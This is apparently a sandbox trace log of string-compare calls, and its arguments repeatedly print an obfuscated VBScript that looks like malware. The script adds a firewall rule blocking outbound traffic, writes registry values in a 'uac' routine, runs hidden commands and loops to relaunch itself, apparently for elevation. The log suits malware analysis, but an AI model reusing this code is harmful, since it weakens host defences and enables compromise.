Begin signature block", _MaxCount=0x21) returned 54 [0226.356] wcsncmp (_String1="reateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0226.357] wcsncmp (_String1="eateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.357] wcsncmp (_String1="ateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84 [0226.357] wcsncmp (_String1="teObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0226.357] wcsncmp (_String1="eObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf 